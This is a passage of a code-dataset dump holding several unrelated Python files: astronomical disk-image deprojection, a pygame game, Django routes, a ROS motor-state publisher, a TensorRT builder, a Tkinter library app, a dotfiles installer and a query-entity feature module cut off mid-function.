:meth:`~diskmap.diskmap.DiskMap.map_disk`.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if self.radius is None or self.azimuth is None:\n raise ValueError('The disk has not been mapped yet with the \\'map_disk\\' method.')\n\n im_disk, image_xy = self.sort_disk()\n\n # Interpolate disk plane\n\n if self.npix % 2 == 0:\n x_grid = np.linspace(-self.npix/2+0.5, self.npix/2-0.5, self.npix)\n y_grid = np.linspace(-self.npix/2+0.5, self.npix/2-0.5, self.npix)\n\n elif self.npix % 2 == 1:\n x_grid = np.linspace(-(self.npix-1)/2, (self.npix-1)/2, self.npix)\n y_grid = np.linspace(-(self.npix-1)/2, (self.npix-1)/2, self.npix)\n\n x_grid *= self.pixscale*self.distance # (au)\n y_grid *= self.pixscale*self.distance # (au)\n\n grid = np.zeros((self.npix**2, 2))\n\n count = 0\n\n for i in range(self.npix):\n for j in range(self.npix):\n grid[count, 0] = x_grid[i]\n grid[count, 1] = x_grid[j]\n\n count += 1\n\n try:\n fit_im = griddata(image_xy, im_disk, grid, method='linear')\n\n except ValueError:\n raise ValueError('The radius sampling should cover the complete field of view of the '\n 'image. Try increasing the outer \\'radius\\' value in \\'map_disk\\' '\n 'and have a look at the \\'_radius.fits\\' output to check for NaNs.')\n\n self.im_deproj = np.zeros((self.npix, self.npix))\n\n count = 0\n\n for i in range(self.npix):\n for j in range(self.npix):\n self.im_deproj[i, j] = fit_im[count]\n\n count += 1\n\n @typechecked\n def r2_scaling(self,\n r_max: float) -> None:\n \"\"\"\n Function for correcting a scattered light image for the r^2 decrease of the stellar\n irradiation of the disk surface.\n\n Parameters\n ----------\n r_max : float\n Maximum disk radius (au) for the r^2-scaling. Beyond this distance, a constant\n r^2-scaling is applied of value ``r_max``.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if self.radius is None:\n raise ValueError('Please run \\'map_disk\\' before using \\'r2_scaling\\'.')\n\n self.im_scaled = np.zeros((self.npix, self.npix))\n\n for i in range(self.npix):\n for j in range(self.npix):\n if self.radius[i, j] < r_max:\n self.im_scaled[i, j] = self.radius[i, j]**2 * self.image[i, j]\n\n else:\n self.im_scaled[i, j] = r_max**2 * self.image[i, j]\n\n @typechecked\n def total_intensity(self,\n pol_max: 1.) -> None:\n \"\"\"\n Function for estimating the (stellar irradiation corrected) total intensity image when\n ``fitsfile`` contains a polarized light image and ``image_type='polarized'``. A bell-shaped\n degree of polarized is assumed and effects of multiple scattering are ignored.\n\n Parameters\n ----------\n pol_max : float\n The peak of the bell-shaped degree of polarization, which effectively normalizes the\n estimated total intensity image.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if self.image_type != 'polarized':\n raise ValueError('The \\'total_intensity\\' method should only be used if the input '\n 'image is a polarized light image (i.e. image_type=\\'polarized\\').')\n\n if self.scatter is None or self.im_scaled is None:\n raise ValueError('Please run \\'map_disk\\' before using \\'total_intensity\\'.')\n\n alpha = np.cos(self.scatter)\n deg_pol = -pol_max * (alpha**2 - 1.) / (alpha**2 + 1.)\n\n self.stokes_i = self.im_scaled / deg_pol\n\n @typechecked\n def phase_function(self,\n radius: Tuple[float, float],\n n_phase: int):\n \"\"\"\n Function for extracting the phase function. If ``image_type='polarized'``, the polarized\n phase function is extracted and the total intensity phase function is estimated by assuming\n a bell-shaped degree of polarization. If ``image_type='polarized'``, the total intensity\n phase function is extracted. The extracting is done on the r$^2$-scaled pixel values\n such that the phase function is not biased by irradiation effects. The phase functions are\n have been normalized by their maximum value.\n\n Parameters\n ----------\n radius : tuple(float, float)\n Inner and outer radius (au) between which pixels are selected for estimating the phase\n function.\n n_phase : int\n Number of sampling points for the phase function between 0 and 180 deg.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n # Phase function is normalizedf so pol_max has not effect\n pol_max = 1.\n\n if self.radius is None or self.scatter is None or self.im_scaled is None:\n raise ValueError('Please run \\'map_disk\\' and \\'r2_scaling\\' before using '\n '\\'phase_function\\'.')\n\n scat_select = []\n im_select = []\n\n for i in range(self.npix):\n for j in range(self.npix):\n if self.radius[i, j] > radius[0] and self.radius[i, j] < radius[1]:\n scat_select.append(math.degrees(self.scatter[i, j]))\n\n # use im_scaled to correct for differences across the selected radius\n im_select.append(self.im_scaled[i, j])\n\n phase_bins = np.linspace(0., 180., num=n_phase)\n bin_index = np.digitize(scat_select, phase_bins)\n\n im_bins = []\n scat_bins = []\n\n for i in range(n_phase):\n im_bins.append([])\n scat_bins.append([])\n\n for i, _ in enumerate(im_select):\n im_bins[bin_index[i]-1].append(im_select[i])\n scat_bins[bin_index[i]-1].append(scat_select[i])\n\n angle = []\n pol_flux = []\n pol_error = []\n\n for i in range(n_phase):\n if len(im_bins[i]) > 0:\n angle.append(np.nanmean(scat_bins[i]))\n pol_flux.append(np.nanmean(im_bins[i]))\n pol_error.append(np.nanstd(im_bins[i])/math.sqrt(len(im_bins[i])))\n\n if self.image_type == 'polarized':\n # Degree of polarization\n\n alpha = np.cos(np.array(angle)*np.pi/180.)\n deg_pol = -pol_max*(alpha*alpha-1.)/(alpha*alpha+1.)\n\n tot_flux = pol_flux/deg_pol\n tot_error = pol_error/deg_pol\n\n # Normalization\n\n flux_norm = max(pol_flux)\n pol_flux = np.array(pol_flux)/flux_norm\n pol_error = np.array(pol_error)/flux_norm\n\n flux_norm = max(tot_flux)\n tot_flux = np.array(tot_flux)/flux_norm\n tot_error = np.array(tot_error)/flux_norm\n\n self.phase = np.column_stack([angle, pol_flux, pol_error, tot_flux, tot_error])\n\n else:\n self.phase = np.column_stack([angle, pol_flux, pol_error])\n\n @typechecked\n def write_output(self,\n filename: str) -> None:\n \"\"\"\n Function for writing the available results to FITS files.\n\n Parameters\n ----------\n filename : str\n Filename start that is used for all the output file.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if self.radius is not None:\n fits.writeto(f'{filename}_radius.fits', self.radius, overwrite=True)\n\n if self.scatter is not None:\n fits.writeto(f'{filename}_scat_angle.fits', np.degrees(self.scatter), overwrite=True)\n\n if self.im_deproj is not None:\n fits.writeto(f'{filename}_deprojected.fits', self.im_deproj, overwrite=True)\n\n if self.im_scaled is not None:\n fits.writeto(f'{filename}_r2_scaled.fits', self.im_scaled, overwrite=True)\n\n if self.stokes_i is not None:\n fits.writeto(f'{filename}_total_intensity.fits', self.stokes_i, overwrite=True)\n\n if self.phase is not None:\n if self.image_type == 'polarized':\n header = 'Scattering angle (deg) - Normalized polarized flux - Error ' \\\n '- Normalized total flux - Error'\n\n else:\n header = 'Scattering angle (deg) - Normalized total flux - Error'\n\n np.savetxt(f'{filename}_phase_function.dat', self.phase, header=header)\n","sub_path":"diskmap/diskmap.py","file_name":"diskmap.py","file_ext":"py","file_size_in_byte":20545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"107946855","text":"import pygame\nimport random\n\n# Color\nBlack = (0, 0, 0)\nBallColor = (255, 255, 255)\nPlayerColor = (160, 82, 45)\n\npygame.init()\nscreen = pygame.display.set_mode((640, 480))\nmyclock = pygame.time.Clock()\n\nflag = 0\nGameStart = 0\ncount = 5\nPlayer_X = 280\nBall_X = random.randrange(15,625)\nBall_Y = 10\nBallRadius = 10\nSpeedVector_X = random.randint(0, 10) - 5\nSpeedVector_Y = random.randint(3, 5)\n\nwhile flag == 0:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n flag = 1\n #GameStart描画\n while GameStart == 0:\n screen.fill(Black)\n font = pygame.font.SysFont(None, 80)\n Title_text = font.render(\"Getting Ball\", True, BallColor)\n screen.blit(Title_text, (160, 100))\n font = pygame.font.SysFont(None, 40)\n Start_text = font.render(\"Please wait \" + str(count) + \"seconds\", True, PlayerColor)\n screen.blit(Start_text, (200, 300))\n pygame.display.flip()\n pygame.time.delay(1000)\n count -= 1\n if count == 0: GameStart = 1\n\n press = pygame.key.get_pressed()\n if press[pygame.K_LEFT] and Player_X > 0: Player_X -= 5\n if press[pygame.K_RIGHT] and Player_X < 560: Player_X += 5\n screen.fill(Black)\n # Player描画\n Player = pygame.Rect(Player_X, 440, 80, 10)\n pygame.draw.rect(screen, PlayerColor, Player)\n # Ball描画\n Ball_X += SpeedVector_X\n Ball_Y += SpeedVector_Y\n pygame.draw.circle(screen, BallColor, (Ball_X, Ball_Y), BallRadius)\n #Ball反射&当たり判定\n if Ball_X < 10 or Ball_X > 630:SpeedVector_X *= -1 # X反射\n if Ball_Y > 500: # GameOver\n screen.fill(Black)\n font = pygame.font.SysFont(None, 80)\n End_text = font.render(\"Game Over\", True, BallColor)\n screen.blit(End_text, (160, 100))\n pygame.time.delay(1000)\n flag = 1\n if Ball_Y == 430:\n if Ball_X > Player_X and Ball_X < Player_X + 80:\n Ball_X = random.randrange(15,625)\n Ball_Y = 10\n SpeedVector_X = random.randint(0, 10) - 5\n SpeedVector_Y = random.randint(3, 5)\n pygame.display.flip()\n myclock.tick(60)\n\npygame.quit()\n","sub_path":"GettingBall.py","file_name":"GettingBall.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292184015","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'users'\n\nurlpatterns = [\n path('users/', views.ShowUsersView.as_view(),\n name='users'),\n path('add_user/', views.AddUserView.as_view(),\n name='add-user'),\n path('delete_user/', views.DeleteUserView.as_view(),\n name='delete-user'),\n path('login', views.LoginUserView.as_view(),\n name='login'),\n path('logout', views.LogoutUserView.as_view(),\n name='logout'),\n]\n","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"170584936","text":"#!/usr/bin/env python\n\nimport rospy\nimport rosparam\nfrom sensor_msgs.msg import JointState\nfrom dynamixel_msgs.msg import MotorState\nfrom dynamixel_msgs.msg import MotorStateList\nfrom math import pi\nimport time\n\nrospy.init_node('State_Publisher')\n\n# Name of the joints in the robotic arm\n# Name of motor ID [1,2,3,4,5,6] is specified in the list.\njoints = [\"Ljoint0\",\"Ljoint1\",\"Ljoint2\",\"Ljoint3\",\"Ljoint4\",\"Ljoint5\",\"Ljoint6\"]\n\n\n#Dynamixel Motors will not be in Position 0 when switched ON. Dynamixel motors will have some initial position value. \n#In the URDF it is assumed that initial joint value is 0 radian. \n#Hence offset is required to match the URDF and the real robot.\n#Offset for motor id [10,11,13,14,15,16,17] is specified in the list.\nstart_ID = 10\n\nj0_init = rosparam.get_param(\"/LArm/joint0_controller/motor/init\")\nj1_init = rosparam.get_param(\"/LArm/joint1_controller/motor_master/init\")\nj2_init = rosparam.get_param(\"/LArm/joint2_controller/motor/init\")\nj3_init = rosparam.get_param(\"/LArm/joint3_controller/motor/init\")\nj4_init = rosparam.get_param(\"/LArm/joint4_controller/motor/init\")\nj5_init = rosparam.get_param(\"/LArm/joint5_controller/motor/init\")\nj6_init = rosparam.get_param(\"/LArm/joint6_controller/motor/init\")\n\n# offset = [512,512,512,512,512,512,512]\noffset = [j0_init,j1_init,j2_init,j3_init,j4_init,j5_init,j6_init]\nprint('L: ',offset)\n# offset = [512,2047,512,512,512,512,512]\n\n'''\nFunction: process(). Callback for subscriber of raw data from dynamixel motor. \nLogic: Dynamixel position = 0 for 0 degree and Dynamixel position = 1023 for 300 degree.\n Current position can be calculated by (position*(300.0/1023))*(pi/180) radian.\n Where position = feddback-offset.\n'''\ndef process(msg):\n\tjoint_states = JointState()\n\tjoint_states.header.stamp = rospy.Time.now()\n\n\tfor x in msg.motor_states:\n\n\t\tif(x.id != 12):\n\t\t\t# print(\"ID: {}\".format(x.id))\n\t\t\tif(x.id >= 13):\n\t\t\t\tif(x.id == 17): # in rrbot.xacro, the eef joint's name is left/right _gripper_joint. so chenge the name ans send the same parameter respectively.\n\t\t\t\t\teef_joints = ['Lleft_gripper_joint','Lright_gripper_joint']\n\t\t\t\t\tfor joint in eef_joints:\n\t\t\t\t\t\tjoint_states.name.append(joint)\n\t\t\t\t\t\tjoint_states.position.append((x.position-offset[x.id-start_ID-1])*(300.0/1023)*(pi/180))\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t#in case x.id == 13,14,15,16\n\t\t\t\t\tjoint_states.name.append(joints[x.id-start_ID-1])\n\t\t\t\t\tjoint_states.position.append((x.position-offset[x.id-start_ID-1])*(300.0/1023)*(pi/180))\n\t\t\telse:\n\t\t\t\tif(x.id == 10):\n\t\t\t\t\tresolution = 1023\n\t\t\t\t\tdeg_range = 300.0\n\t\t\t\telse:\n\t\t\t\t\t#in case x.id == 11\n\t\t\t\t\tresolution = 1023 if(offset[1] < 2000) else 4095 if(offset[1] > 2000) else 0\n\t\t\t\t\tdeg_range = 300.0 if(offset[1] < 2000) else 360.0\n\n\t\t\t\tif (resolution==0): \n\t\t\t\t\tprint('please check the offset value of pkg:dynamixelmotor node:state_publisher.py')\n\t\t\t\t\tprint('Probably offset value inside code is wrong')\n\t\t\t\t\tbreak\n\t\t\t\tjoint_states.name.append(joints[x.id-start_ID])\n\t\t\t\tjoint_states.position.append((x.position-offset[x.id-start_ID])*(deg_range/resolution)*(pi/180))\n\n\t\t#joint_states.velocity.append(x.velocity)\n\tpub.publish(joint_states)\n\n# Subscriber for raw feedback from dynamixel motor. Position of the motor will be in the range of (0,1023).\nsub = rospy.Subscriber('/LArm/motor_states/conbe_L_port',MotorStateList,process)\n# Publisher for the current position of dynamixel motor in radian\npub = rospy.Publisher('/LArm/joint_states',JointState,queue_size=10)\n\nrospy.spin()","sub_path":"dynamixel_motor/conbe/scripts/state_publisherL.py","file_name":"state_publisherL.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"140717239","text":"\nimport tensorrt as trt\nimport pycuda.driver as cuda\n\n\ndef ONNX_build_engine(onnx_file_path):\n '''\n 通过加载onnx文件,构建engine\n :param onnx_file_path: onnx文件路径\n :return: engine\n '''\n # 打印日志\n G_LOGGER = trt.Logger(trt.Logger.WARNING)\n\n with trt.Builder(G_LOGGER) as builder, builder.create_network() as network, trt.OnnxParser(network, G_LOGGER) as parser:\n builder.max_batch_size = 100\n builder.max_workspace_size = 1 << 20\n\n print('Loading ONNX file from path {}...'.format(onnx_file_path))\n with open(onnx_file_path, 'rb') as model:\n print('Beginning ONNX file parsing')\n parser.parse(model.read())\n print('Completed parsing of ONNX file')\n\n print('Building an engine from file {}; this may take a while...'.format(\n onnx_file_path))\n network.mark_output(network.get_layer(\n network.num_layers - 1).get_output(0))\n engine = builder.build_cuda_engine(network)\n print(\"Completed creating Engine\")\n\n # 保存计划文件\n # with open(engine_file_path, \"wb\") as f:\n # f.write(engine.serialize())\n return engine\n\n\nif __name__ == \"__main__\":\n ONNX_build_engine('yolov3_cap.onnx')\n","sub_path":"cap/build_engine.py","file_name":"build_engine.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"269774972","text":"from project.host import Host\nfrom project.components.hdd import Hdd\nfrom project.components.ram import Ram\n\nclass Server(Host):\n def __init__(self):\n Host.__init__(self)\n\n hdd1 = Hdd('hdd1')\n hdd1.set_size(2)\n self.add_hdd(hdd1)\n\n ram1 = Ram('ram1')\n ram1.set_size(16)\n self.add_ram(ram1)\n\n def display(self):\n print ('Caractéristiques de la machine :')\n print('RAM ' + str(self.get_global_ram()) + ' GO')\n print('HDD ' + str(self.get_global_hdd()) + ' TO')\n print('Nombre de pièces ' + str(self.get_num_components()))\n","sub_path":"Host_with_server/project/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"489432942","text":"import datetime\nfrom tkinter import *\nimport time\nfrom datetime import datetime\nfrom tkinter import messagebox\nimport os\nimport mysql.connector as ms\n\nfrom db_credentials import setu\nfrom members import *\nfrom books import *\nfrom reg_window import *\nfrom book_window import *\nfrom borrow_window import *\n\n\n\n\"\"\"Setting up the geometry and the title\"\"\"\nroot = Tk()\nroot.title(\"Library management system\")\nroot.geometry('1600x800+0+0')\n\"\"\"set\"\"\"\n\n\nTopframe = Frame(root, width = 1350, height = 50,borderwidth=60, bd = 8, relief =\"sunken\")\nTopframe.pack(side = TOP)\n\nframeone = Frame(root, width = 600, height = 600,borderwidth=60,bg=\"lightgreen\", bd = 8, relief = \"sunken\")\nframeone.pack(side = LEFT)\n\n\nframetwo = Frame(root, width = 300, height = 700,borderwidth=60, bd = 8, relief = \"sunken\")\nframetwo.pack(side = RIGHT)\n\nfla = Frame(frameone,width = 600, height = 200, bd = 20,bg=\"lightgrey\", relief = \"raise\")\nfla.pack(side = TOP)\n\nflb = Frame(frameone,width = 600, height = 600, bd = 20,bg=\"lightgrey\", relief = \"raise\")\nflb.pack(side = TOP)\n\n\n\n\ndateoforder = StringVar()\ntimeoforder = StringVar()\n\n\ndateoforder.set(time.strftime(\"%d/%m/%Y\"))\ntimeoforder.set(time.strftime(\"%H:%M\"))\n\nlblName = Label(fla, text = \"BOOKS\",bg=\"lightgrey\",fg = \"red\", font = ('arial',30,'bold'),bd = 20)\nlblName.grid(row = 0, column = 0)\n\nlbladdress = Label(fla, text = \"MEMBERS\",bg=\"lightgrey\",fg = \"red\", font = ('arial',30,'bold'),bd = 20)\nlbladdress.grid(row = 0, column = 2)\n\nlbladdress = Label(fla, text = \"Utility\",bg=\"lightgrey\",fg = \"red\", font = ('arial',30,'bold'),bd = 20)\nlbladdress.grid(row = 0, column = 3)\n\n\n#buttons\n\nact_addbook_win = Button(fla,text = 'Add book', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_addbook_win).grid(row = 1, column = 0)\n\nact_searchBook_win = Button(fla,text = 'Search book', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_searchBook_win).grid(row = 2, column = 0)\n\nact_listAllbooks_win = Button(fla,text = 'All books', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_listAllbooks_win).grid(row = 3, column = 0)\n\n#act_up8Book_win = Button(fla,text = 'Update book', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16,'bold'), width = 15, height = 1).grid(row = 4, column = 0)\n\nact_registerMember_win = Button(fla,text = 'Register member', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_reg_win).grid(row = 1, column = 2)\nact_allMembers_win = Button(fla,text = 'Search Member', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"lightyellow\", font = ('arial',16), width = 15, height = 1,command = start_listAll_members).grid(row = 2, column = 2)\n\n\nact_issueBook_win = tk.Button(fla, text=\"Issue Book\", padx=16, pady=16, bd=8, fg=\"black\", bg=\"lightyellow\", font=('arial',16,'bold'),width=15, height=1, command = start_issueBook_win).grid(row=1, column=3)\nact_returnBook_win = tk.Button(fla,text=\"Return Book\",padx = 16, pady = 16, bd=8, fg = \"black\", bg = \"lightyellow\", font = ('arial',16,'bold'), width = 15, height=1, command = start_returnBook_win).grid(row =2, column=3)\nact_unreturned_books = tk.Button(fla,text=\"Unreturned Books\",padx = 16, pady = 16, bd=8, fg = \"black\", bg = \"lightyellow\", font = ('arial',16), width = 15, height=1, command = start_unreturnedBooks_win).grid(row =3, column=3)\n\nexit = Button(flb,text = 'Exit', padx = 16, pady = 16, bd =8, fg = \"black\",bg = \"red\", font = ('arial',16,'bold'), width = 20, height = 1, command= root.destroy).grid(row = 0, column = 1)\n\n\n\n\n\n\n\nlbldate = Label(frametwo,textvariable = dateoforder, font = ('arial',21,'bold')).grid(row = 0, column = 0)\nlbltime = Label(frametwo,textvariable = timeoforder, font = ('arial',21,'bold')).grid(row = 1, column = 0)\ntxtsalary = Text(frametwo, height = 22, width = 34, bd = 16, font=('arial',12,'bold'))\ntxtsalary.grid(row = 2, column = 0)\n\n\nlblinfo = Label(Topframe, font =('arial', 60, 'bold'), bg = \"lightblue\",fg = \"Blue\", text = \" MIT Academy of Engineering \", bd = 10,)\nlblinfo.grid(row = 0, column = 0)\n\nlblmin = Label(Topframe, font = ('arial',15),fg=\"Blue\", text = \"(An Autonomous institute affiliated to SPPU)\")\nlblmin.grid(row = 1,column = 0)\nlblmin = Label(Topframe, font = ('arial',15), text = \"School of Computer Engineering and Technology\")\nlblmin.grid(row = 2,column = 0)\n\n\n\nroot.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"418312721","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport subprocess\nimport argparse\nimport logging\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\n\nfrom logging import Formatter, StreamHandler\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n_handler = StreamHandler()\n_handler.setFormatter(Formatter(\n '%(asctime)s %(levelname)s: %(message)s',\n '%Y-%m-%d %H:%M:%S'\n))\nlogger.addHandler(_handler)\n\ndef error(msg, *args, **kwargs):\n logger.error(msg, *args)\n if 'exit' in kwargs and kwargs['exit']:\n sys.exit(1)\n\nclass Command():\n def update_submodules(self):\n proc = subprocess.Popen(['git', 'submodule', 'init'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to initialize git submodules\", exit=True)\n\n proc = subprocess.Popen(['git', 'submodule', 'update'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to update git submodules\", exit=True)\n\nclass Install(Command):\n def __init__(self, options):\n self.options = options\n self.update_submodules()\n self.install_dotfiles()\n self.install_vundle()\n\n def install_dotfiles(self):\n to_install = os.listdir(os.path.join(BASE_DIR, 'dotfiles'))\n to_install = self.filter_shellfiles(to_install)\n for source in to_install:\n source_path = os.path.join(BASE_DIR, 'dotfiles', source)\n target_path = os.path.join(os.environ['HOME'], '.' + source)\n self.remove_file(target_path)\n os.symlink(source_path, target_path)\n logger.info('Linked %s', source_path)\n\n def filter_shellfiles(self, dotfiles):\n if self.options.shell == 'zsh':\n return [f for f in dotfiles if 'bash' not in f]\n elif self.options.shell == 'bash':\n return [f for f in dotfiles if 'zsh' not in f]\n\n def remove_file(self, target):\n proc = subprocess.Popen(['rm', '-rf', target],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to remove file %s\", target, exit=True)\n\n def install_vundle(self):\n proc = subprocess.Popen(['vim', '+PlugInstall', '+qall'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to install vim plugins...\", exit=True)\n\nclass Update(Command):\n def __init__(self, options):\n self.options = options\n self.update_git()\n self.update_submodules()\n self.update_vundle()\n\n def update_git(self):\n proc = subprocess.Popen(['git', 'pull'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to pull latest changes\", exit=True)\n\n def update_vundle(self):\n proc = subprocess.Popen(['vim', '+PlugUpdate', '+qall'])\n ret = proc.wait()\n if ret != 0:\n error(\"Failed to update vundle, I recommend running :PlugUpdate inside vim.\", exit=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n subparser = subparsers.add_parser('install', help=\"Install rcfiles into your home directory.\")\n subparser.add_argument('--shell', default=\"zsh\", choices=[\"zsh\", \"bash\"], help=\"Which shell you want to install rc files for.\")\n subparser.set_defaults(CommandClass=Install)\n\n subparser = subparsers.add_parser('update', help=\"Update rcfiles.\")\n subparser.set_defaults(CommandClass=Update)\n\n options = parser.parse_args()\n command = options.CommandClass(options)\n","sub_path":"rcfiles.py","file_name":"rcfiles.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"367687497","text":"'''\nCreated on Jan 10, 2013\n\n@author: ivanka li\n\nThis module take in the complete list of query-entity pairs. \n\nAnd match each query-entity pair with their decision tree classification.\n\n'''\n# from CleanDecisionResults import CleanDecision\nfrom AxesDecisionResults import AxesDecisionResults\n\nimport sys, re, random, os.path, subprocess\n \nclass QueryEntities():\n \n def __init__(self, qe, attrPath):\n self.qePairs, self.attrList = [], []\n self.initQE(qe)\n self.initAttr(attrPath) \n \n \n def initQE(self, qe):\n if os.path.isfile(qe):\n fhandler = open(qe, 'r')\n for line in fhandler.readlines():\n if len( line.split() ) > 1 and re.match(r'[0-9]', line)!=0:\n self.qePairs.append(line)\n # print line.replace('\\r\\n', '').split('\\t')\n fhandler.close()\n else:\n self.qePairs.append(qe)\n \n def initAttr(self, attrPath):\n if os.path.isfile(attrPath):\n fhandler = open(attrPath, 'r')\n lno = 1\n for line in fhandler.readlines():\n if not re.match(\"@\", line) and len(line) > 1: \n self.attrList.append( map( lambda x: int(x), line.split(',')[:-1] ) )\n lno = lno +1\n fhandler.close()\n else:\n self.attrPath.append(attrPath)\n \n\ndef deprecated(replacement=None):\n '''This is a decorator which can be used to mark functions\n as deprecated. It will result in a warning being emitted\n when the function is used.'''\n \nclass IgAttributes():\n \n def __init__(self, XYDecision, QueryEntity, EntityAttrPath, AnnotationPath, num_of_queries):\n self.axesDecision = AxesDecisionResults(XYDecision)\n self.qe = QueryEntities(QueryEntity, EntityAttrPath)\n self.annotation = Annotations(AnnotationPath)\n self.numOfX, self.numOfY, self.singularPluralX, self.superlatives, self.specialWords, self.npRelation, self.time, self.modified, self.wiki_sim = \\\n [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries, \\\n [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries, [0]*num_of_queries\n self.__runAll()\n \n \n def __numOfXEntities(self):\n '''\n 4 class values: \n - no X found: 0 \n - 1 X found: 1 \n - 2 X found: 2 \n - more than 2 X found: 3\n '''\n for q_index in range( len( self.axesDecision.resultList ) ):\n count = 0\n for r in self.axesDecision.resultList[q_index]:\n if r == 'x': count = count + 1\n if count == 0:\n self.numOfX[q_index] = 0\n elif count == 1:\n self.numOfX[q_index] = 1\n elif count == 2: \n self.numOfX[q_index] = 2\n else:\n self.numOfX[q_index] = 3\n \n def __numOfYEntities(self):\n '''\n 3 class values:\n - no y found: 0\n - 1 y found: 1\n - more than 1 y found: 2\n '''\n for q_index in range( len( self.axesDecision.resultList ) ):\n count = 0\n for r in self.axesDecision.resultList[q_index]:\n if r == 'y': count = count + 1\n if count == 0:\n self.numOfY[q_index] = 0 \n elif count <= 2:\n self.numOfY[q_index] = 1\n else:\n self.numOfY[q_index] = 2\n \n def __pluralX(self):\n '''\n Use attr no. 37 NP_sorp to see if in the entity list any entity has plural form\n 3 class value: \n - all X are singular: 0\n - all X are plural: 1\n - X have singular vs plural: 2\n '''\n for q_index in range( len(self.axesDecision.rangeList) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n plural, numX = 0, 0\n # ---\n# sys.stdout.write('%d\\n' % q_index)\n # ---\n for en_index in range(lo, hi+1):\n if self.axesDecision.resultList[q_index][en_index-lo] == 'x' and self.qe.attrList[en_index][46] !=1:\n # is X entity, and not time interval\n numX = numX +1\n plural = self.qe.attrList[en_index][37] + plural\n # ---\n# sys.stdout.write('%s' % self.qe.qePairs[en_index].replace('\\t', '').replace('U.S.', 'united states'))\n # ---\n if self.axesDecision.resultList[q_index][en_index-lo] == 'x' and self.qe.attrList[en_index][46] > 0: \n plural = -1\n if plural == -1:\n self.singularPluralX[q_index] = 0\n elif plural == 0: \n # all singular\n self.singularPluralX[q_index] = 1\n elif plural == numX: \n # all plural\n self.singularPluralX[q_index] = 2\n elif plural < numX: \n # singular mixed with plural\n self.singularPluralX[q_index] = 3\n \n def __modifiedX(self):\n '''\n Use attr no 22, 23, 24 to see whether the entity is modified by all, other, each\n 4 class value:\n - No modification: 0\n - Modified by \"all\": 1\n - Modified by \"other\": 2\n - Modified by \"each\": 3\n '''\n for q_index in range( len(self.axesDecision.rangeList) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n for en_index in range(lo, hi+1):\n if self.axesDecision.resultList[q_index][en_index-lo] == 'x':\n if self.qe.attrList[en_index][22] == 1:\n self.modified[q_index] = 1\n elif self.qe.attrList[en_index][23] == 1:\n self.modified[q_index] = 2\n elif self.qe.attrList[en_index][24] == 1:\n self.modified[q_index] = 3\n \n def __superlative(self):\n '''\n 2 class values: Yes/No\n '''\n for q_index in range( len( self.axesDecision.rangeList ) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n self.superlatives[q_index] = self.qe.attrList[lo][0] \n \n def __trendCompareWords(self):\n '''\n use attribute no 2 trend_in_sentence and no 3 compare_in_sentence\n 4 class values:\n - neither verb: 0\n - compare verb: 1\n - trend verb: 2\n '''\n for q_index in range( len( self.axesDecision.rangeList ) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n if self.qe.attrList[lo][2] < self.qe.attrList[lo][3] :\n self.specialWords[q_index] = 1\n elif self.qe.attrList[lo][2] > self.qe.attrList[lo][3]:\n self.specialWords[q_index] = 2\n \n def __npPattern(self):\n '''\n must be ran after function pluralX() and trendCompareVb()\n 3 class values:\n - none: 0\n - singular np vs singular np: 1\n - singular np vs plural np: 2\n - plural compared: 3\n '''\n for q_index in range( len(self.axesDecision.rangeList) ):\n if self.specialWords[q_index] == 1:\n if self.singularPluralX[q_index] == 1 :\n # all singular\n if self.numOfX[q_index] >2:\n self.npRelation[q_index] = 3\n else:\n 